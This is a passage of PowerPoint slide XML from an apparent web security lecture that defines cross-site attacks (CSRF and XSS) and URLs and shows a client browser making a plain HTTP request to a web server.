        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8382000" y="2895600"/>
            <a:ext cx="7620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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Yes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11E604B1-6221-6241-A86E-95AB0B3508F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8382000" y="3562035"/>
            <a:ext cx="7620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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD0C01E6-3BB4-A845-AE69-EA10B73C959D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8382000" y="4228470"/>
            <a:ext cx="7620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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{479ADE6E-5A69-5740-BD16-A93472B9A0B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8382000" y="4991100"/>
            <a:ext cx="7620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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F8FB274-627A-E74C-A2D0-EC4125587F33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8382000" y="5787231"/>
            <a:ext cx="7620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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25935184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Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E5DB4FC-2855-DB42-9072-55BD7E0D1693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="259080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4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Attack?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299142880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Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E5DB4FC-2855-DB42-9072-55BD7E0D1693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="259080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4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A6080C8-712C-014F-947E-17EDCCFA0CC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="320040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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF: Cross-Site Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10767A5E-6EA7-A74F-88AE-B622B18EC2AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="370332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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS: Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251125271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5EEF0-6350-7046-8109-3E4853B1E0E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{047FAA41-0528-1246-B1FB-CED98ADA07A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Exploit cookies that a web server uses to identify a user within a connection session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible for third-party websites to forge requests that are exactly the same as the same-site requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server cannot distinguish between the same-site and cross-site requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9789297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ACC276-41B3-D94A-A221-1D642D558EEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A78882E-4961-3D43-842A-B245A7D7BC85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL: Uniform Resource Locator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Global identifiers of network-retrievable resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78CD938C-06EB-704E-84B1-4BAD64BD531B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3716020"/>
            <a:ext cx="3487735" cy="2862261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FA6D9DC-1C6D-E144-BFD0-CD472935ED0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="147637" y="3711257"/>
            <a:ext cx="3497579" cy="2872105"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3497579" h="2872104">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3497260" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3497260" y="2871786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2871786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA971AB-0A6D-B04C-8EAF-256EDB50B03F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7366000" y="3351600"/>
            <a:ext cx="1549400" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-90" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SERVER</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{657B2EDB-7B4B-504C-B558-26067254F027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3850961" y="4883156"/>
            <a:ext cx="3577263" cy="143862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B88B73AF-B676-174D-AB2F-7B9CA2BF1D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3910011" y="4919205"/>
            <a:ext cx="3328670" cy="25400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3328670" h="25400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3328594" y="24789"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38099">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B76102-D869-0845-AAD0-C65011FCFD9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7176391" y="4881781"/>
            <a:ext cx="156135" cy="123790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E8AF6C1-2765-BD47-9E2B-809482FA6BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3850960" y="5555378"/>
            <a:ext cx="3577264" cy="147691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD08F499-E338-504C-80CD-386DD99B0943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4040577" y="5592544"/>
            <a:ext cx="3328670" cy="28575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3328670" h="28575">
                <a:moveTo>
                  <a:pt x="3328596" y="28475"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38099">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA03179A-D65E-1348-904C-F12B51AF8DC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3946657" y="5531015"/>
            <a:ext cx="156182" cy="123790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6465A280-220E-8748-8D29-1E50178766FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669245" y="3352800"/>
            <a:ext cx="2159000" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CLIENT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-90" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>BROWSER</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5378C879-5C9F-DD41-ADBB-B0371C698EA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4237827" y="4048267"/>
            <a:ext cx="2799080" cy="763270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="44450" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>REQUEST:</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPts val="1950"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET /account.html HTTP/1.1  Host:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>www.safebank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF517456-CB06-2545-826D-F8FA458C09D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4571999" y="5751879"/>
            <a:ext cx="2159000" cy="657860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
